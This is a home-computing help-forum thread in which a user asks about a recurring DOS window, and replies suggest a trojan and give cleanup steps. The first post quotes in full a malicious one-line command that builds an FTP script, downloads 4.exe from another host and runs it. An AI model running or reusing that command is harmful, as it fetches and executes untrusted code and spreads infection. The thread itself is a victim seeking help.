cancel
Showing results for 
Search instead for 
Did you mean: 

Help - Suspicious Behaviour (Spyware/Trojan?)

KevH
Grafter
Posts: 59
Registered: 30-07-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Hi

I need some help from some people more knowledgable than me Cheesy

For the last 2-3 weeks I've had an occasional DOS window open with something trying to run an ftp command. The first time I was at work and the wife rang to say something was up. We quickly shut down the PC and I've run several programs (Adaware, Spybot S+D and the Trend online adaware killers), including the Zone Alarm package that I run, and apart from the usual tracking cookies nothing was found.

This morning another DOS window opened which had the command:

cmd /c echo open 192.168.1.100 31531 >> ik &echo user mik3 j0nes >> ik &echo get 4.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &4.exe &exit

note 192.168.1.100 is another PC on the network at home - all of which I checked out and were clean.

This time ZA asked me for permission to run. Again another system scan didn't find anything.

Any ideas what might be causing this?

Thanks

Kev
4 REPLIES
Community Veteran
Posts: 4,729
Registered: 04-04-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Googling "4.exe" gives;
http://www.liutilities.com/products/wintaskspro/processlibrary/ssk3_b5%20seedcorn%204/

Quote
Description:
ssk3_b5 seedcorn 4.exe is a process belonging to an advertising program by Blue Tide Software. This process monitors your browsing habits and distributes the data back to the author's servers for analysis. This also prompts advertising popups. This process is a security risk and should be removed from your system.

Recommendation for ssk3_b5 seedcorn 4.exe:
DISABLE AND REMOVE ssk3_b5 seedcorn 4.exe IMMEDIATELY. This process is most likely an adware or spyware. It is highly recommended to Run a Free Performance Scan to automatically optimize memory, CPU and Internet settings.
Community Veteran
Posts: 1,229
Thanks: 1
Registered: 30-07-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

hmmm i googled bits of that script and it does seem like a crude virus/trojan which is trying to infect other machines.
probably worth starting in safe mode with networking and running a few of the other online viruscheckers like panda Activescan and Bitdefender
also have a look at http://forums.majorgeeks.com/showthread.php?t=35407
KevH
Grafter
Posts: 59
Registered: 30-07-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Thanks!

Wonder why the ZA, Trend Mirco, adaware and spybot S+D searches didn't spot it?
N/A

Help - Suspicious Behaviour (Spyware/Trojan?)

First got windows system32 and rename ftp.exe to ftpold.exe this will stop the prog doing any damage as it wont be able to get access to ftp. You can rename it back when you solve the problem.

Next download startup cpl from
http://www.mlin.net/StartupCPL.shtml

and see whats running at startup look for anything without an icon or showing a dos box icon. with this startupcpl you can just untick thing to stop them running and tick them if you need to put them back also look for get 4.exe. do a file find for get 4.exe and see if you can find it you could also do a file find for *.cmd or *.bat and see what it finds if you find any you can look at them with notepad. You could do a filefind for a file contains the text ik &ftp -n -v -s:ik &del ik &4.exe &exit and see if that finds it.

Check scheduled task in the control panel to see if there is anything there.

I would suspect that its a script of some sort like a cmd bat or vb script and that is why its not being picked up.

Check in task manager to see whats running and if you arnt sure check with

http://www.processlibrary.com/

to see what the proccess do.